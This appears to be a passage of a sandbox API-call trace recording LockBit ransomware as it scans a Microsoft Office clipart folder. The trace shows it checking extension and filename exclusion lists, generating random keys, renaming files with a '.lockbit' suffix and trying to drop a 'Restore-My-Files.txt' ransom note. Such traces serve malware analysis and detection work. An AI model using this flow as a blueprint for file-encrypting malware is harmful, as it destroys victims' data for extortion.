lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0300862.WMF") returned 1 [0157.267] lstrcmpiW (lpString1="ntldr", lpString2="J0300862.WMF") returned 1 [0157.267] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0300862.WMF") returned 1 [0157.267] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0300862.WMF") returned -1 [0157.267] lstrcmpiW (lpString1="autorun.inf", lpString2="J0300862.WMF") returned -1 [0157.267] lstrcmpiW (lpString1="thumbs.db", lpString2="J0300862.WMF") returned 1 [0157.267] lstrcmpiW (lpString1="iconcache.db", lpString2="J0300862.WMF") returned -1 [0157.267] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0300862.WMF") returned=".WMF" [0157.267] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.267] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.267] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.268] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.268] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0300862.WMF.lockbit") returned 72 [0157.269] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0300862.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0300862.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.271] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.271] malloc (_Size=0x40068) returned 0x3df0008 [0157.271] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17796) returned 1 [0157.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.272] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.277] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0300862.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0300862.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.277] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.277] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.279] free (_Block=0x1fa2ed8) [0157.279] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0300862.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.279] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.279] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.279] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf66f5700, ftCreationTime.dwHighDateTime=0x1bf452d, ftLastAccessTime.dwLowDateTime=0x566ffef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf66f5700, ftLastWriteTime.dwHighDateTime=0x1bf452d, nFileSizeHigh=0x0, nFileSizeLow=0x2b0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0301044.WMF", cAlternateFileName="")) returned 1 [0157.279] lstrcmpiW (lpString1=".", lpString2="J0301044.WMF") returned -1 [0157.279] lstrcmpiW (lpString1="..", lpString2="J0301044.WMF") returned -1 [0157.279] PathFindExtensionW (pszPath="J0301044.WMF") returned=".WMF" [0157.279] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.279] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.280] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.280] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0301044.WMF") returned 1 [0157.281] lstrcmpiW (lpString1="ntldr", lpString2="J0301044.WMF") returned 1 [0157.281] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0301044.WMF") returned 1 [0157.281] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0301044.WMF") returned -1 [0157.281] lstrcmpiW (lpString1="autorun.inf", lpString2="J0301044.WMF") returned -1 [0157.281] lstrcmpiW (lpString1="thumbs.db", lpString2="J0301044.WMF") returned 1 [0157.281] lstrcmpiW (lpString1="iconcache.db", lpString2="J0301044.WMF") returned -1 [0157.281] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.281] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301044.WMF") returned=".WMF" [0157.281] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.281] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.281] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.282] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.283] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301044.WMF.lockbit") returned 72 [0157.283] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301044.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301044.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.284] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.284] malloc (_Size=0x40068) returned 0x3df0008 [0157.284] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11022) returned 1 [0157.284] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.285] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.285] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.285] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.292] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301044.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301044.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.292] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.292] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0157.293] free (_Block=0x1fa2ed8) [0157.293] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301044.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.293] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.293] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.293] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab7300, ftCreationTime.dwHighDateTime=0x1bf4a6c, ftLastAccessTime.dwLowDateTime=0x66162910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ab7300, ftLastWriteTime.dwHighDateTime=0x1bf4a6c, nFileSizeHigh=0x0, nFileSizeLow=0x2ae8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0301052.WMF", cAlternateFileName="")) returned 1 [0157.293] lstrcmpiW (lpString1=".", lpString2="J0301052.WMF") returned -1 [0157.293] lstrcmpiW (lpString1="..", lpString2="J0301052.WMF") returned -1 [0157.293] PathFindExtensionW (pszPath="J0301052.WMF") returned=".WMF" [0157.293] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.293] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.294] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.295] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.295] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0301052.WMF") returned 1 [0157.295] lstrcmpiW (lpString1="ntldr", lpString2="J0301052.WMF") returned 1 [0157.295] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0301052.WMF") returned 1 [0157.295] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0301052.WMF") returned -1 [0157.295] lstrcmpiW (lpString1="autorun.inf", lpString2="J0301052.WMF") returned -1 [0157.295] lstrcmpiW (lpString1="thumbs.db", lpString2="J0301052.WMF") returned 1 [0157.296] lstrcmpiW (lpString1="iconcache.db", lpString2="J0301052.WMF") returned -1 [0157.296] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.296] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301052.WMF") returned=".WMF" [0157.296] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.296] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.296] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.297] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.297] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.297] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.297] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.297] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.297] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.297] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.297] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301052.WMF.lockbit") returned 72 [0157.297] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301052.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301052.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.299] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.299] malloc (_Size=0x40068) returned 0x3df0008 [0157.299] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10984) returned 1 [0157.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.300] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.306] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301052.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301052.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.306] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.306] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.308] 